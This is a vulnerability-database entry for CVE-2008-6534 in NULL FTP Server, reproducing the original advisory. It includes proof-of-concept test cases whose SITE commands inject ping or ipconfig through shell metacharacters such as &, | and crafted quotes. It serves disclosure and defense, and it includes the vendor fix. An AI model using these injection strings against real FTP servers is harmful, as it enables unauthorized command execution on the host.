Vwsolutions Null FTP Server 'SITE'命令任意指令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116946 漏洞类型 输入验证
发布时间 2008-12-05 更新时间 2009-03-27
CVE编号 CVE-2008-6534 CNNVD-ID CNNVD-200903-459
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/7355
https://cxsecurity.com/issue/WLB-2009030230
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-459
|漏洞详情
NULLFTPServer是一款FTP服务器程序。NULLFTPServerFree和Pro1.1.0.7版本中存在不完整黑名单漏洞。远程验证用户可以借助包含自变量中间的一个外壳元字符如"&的客户SITE指令,执行任意指令。
|漏洞EXP
vuln.sg Vulnerability Research Advisory

NULL FTP Server SITE Parameters Command Injection Vulnerability

by Tan Chew Keong
Release Date: 2008-12-05

Summary

A vulnerability has been found in NULL FTP Server. When exploited, this
vulnerability allows an authenticated user to execute arbitrary shell
commands on the FTP server. In order to exploit this vulnerability, the
FTP SITE commands must be enabled on the server and the SITE commands
must be configured to accept parameters from the user.

Tested Versions

   * NULL FTP Server Free/Pro Version 1.1.0.7


Details

A vulnerability has been found in NULL FTP Server. When exploited, this
vulnerability allows an authenticated user to execute arbitrary shell
commands on the FTP server. In order to exploit this vulnerability, the
FTP SITE commands must be enabled on the server and the SITE commands
must be configured to accept parameters from the user.

NULL FTP Server allows customised SITE commands to be defined in the FTP
server, for example, to allow the user to run Windows shell commands
like attrib, dir, etc. It supports the passing of parameters to the SITE
commands so that the user can pass commandline arguments to the
corresponding shell commands.

Parameters are defined using the %readfile1, %writefile1, %1, %2, %3,
%4, %5, %6, %7, %8, and %9 placeholders when creating the SITE commands.
For example, to allow the user to use dir, it is possible to define the
NATIVEDIR SITE command as dir %readfile1. Upon logon to the NULL FTP
Server, the user can issue SITE NATIVEDIR test.txt to run dir test.txt.

NULL FTP Server performs some validation checks on the parameters passed
by the user to prevent command injection. See screenshot below:

However, this validation check is insufficent and thus, cannot totally
prevent the user from injecting arbitrary Windows shell commands.
Enclosing the placeholders in double-quotes do not fully resolve the
issue. Please use the POC instructions below to verify the
vulnerability.

POC / Test Code

Please follow the instructions below to confirm the vulnerability on a Windows system.

Prerequisites

Please configure NULL FTP Server as follows prior to testing:

  1. Create a test user on the NULL FTP Server.

  2. Ensure that this user is given Full Access (i.e. read and write) to the FTP directory. This is required since the %writefile1 parameter requires the user to have write access to the FTP directory.

  3. Configure NULL FTP Server to Enable SITE commands and click on Apply.

  4. Download and extract netcat from here. netcat (nc.exe) will be used to issue FTP commands directly to NULL FTP Server.



Test Case 1

  1. Create the following SITE command in NULL FTP Server if it does not already exist.

     Command Name: NATIVEDIR
     Executable/batch file: dir %readfile1

  2. Using netcat, logon to the FTP server and issue the following SITE command.

     SITE NATIVEDIR "."\""&ping 127.0.0.1&

     OR

     SITE NATIVEDIR a&ipconfig

  3. The above SITE commands will inject the ping or the ipconfig command. See screenshot below.



Test Case 2

The purpose of this test case is to show that enclosing the %readfile1 placeholder in double-quotes will not solve the issue.

  1. Create the following SITE command in NULL FTP Server if it does not already exist.

     Command Name: NATIVEDIR
     Executable/batch file: dir "%readfile1"

  2. Using netcat, logon to the FTP server and issue the following SITE command. Do note that this exploit is slightly different from Test Case 1.

     SITE NATIVEDIR ".""\""&ping 127.0.0.1&

  3. The above SITE command will inject the ping command. See screenshot below.



Test Case 3

  1. Create the following SITE command in NULL FTP Server if it does not already exist.

     Command Name: ATTRIB
     Executable/batch file: attrib %writefile1 %2 %3 %4 %5 %6 %7 %8 %9

  2. Using netcat, logon to the FTP server and issue the following SITE command.

     SITE ATTRIB a&& ping 127.0.0.1

     OR

     SITE ATTRIB a &ping 127.0.0.1

     OR

     SITE ATTRIB a| ping 127.0.0.1

  3. The above SITE command will inject the ping command. See screenshot below.



Test Case 4

  1. Enclosing the placeholders in double-quotes will not solve the issue.

     Command Name: ATTRIB
     Executable/batch file: attrib "%writefile1" "%2" "%3" "%4" "%5" "%6" "%7" "%8" "%9"

     Test Exploit: SITE ATTRIB a" &ping 127.0.0.1&

  2. Again, enclosing the placeholders in double-quotes will not solve the issue.

     Command Name: ATTRIB
     Executable/batch file: attrib %writefile1 "%2" "%3" "%4" "%5" "%6" "%7" "%8" "%9"

     Test Exploit: SITE ATTRIB a &"ping 127.0.0.1&

  3. The above SITE commands will inject the ping command.




Patch / Workaround

Update to version 1.1.0.8. See vendor's release notes.

Disclosure Timeline

2008-11-25 - Vulnerability Discovered.
2008-11-26 - Initial Notification Sent to Vendor (Support Ticket #20786).
2008-11-26 - Initial Vendor Reply. Vulnerability details sent to vendor.
2008-11-27 - Received vendor response that vulnerability has been fixed in version 1.1.0.8, and the fixed version has been released via online update.
2008-12-05 - Public Release.

Contact
For further enquries, comments, suggestions or bug reports, simply email them to Tan Chew Keong.

# milw0rm.com [2008-12-05]
|参考资料

来源:XF
名称:nullftpserver-site-command-execution(47099)
链接:http://xforce.iss.net/xforce/xfdb/47099
来源:www.vwsolutions.com
链接:http://www.vwsolutions.com/knowledgeBase/releaseNotes.aspx?productId=14
来源:VUPEN
名称:ADV-2008-3367
链接:http://www.vupen.com/english/advisories/2008/3367
来源:BID
名称:32656
链接:http://www.securityfocus.com/bid/32656
来源:OSVDB
名称:50486
链接:http://www.osvdb.org/50486
来源:MILW0RM
名称:7355
链接:http://www.milw0rm.com/exploits/7355
来源:MISC
链接:http://vuln.sg/nullftpserver1107-en.html
来源:SECUNIA
名称:32999
链接:http://secunia.com/advisories/32999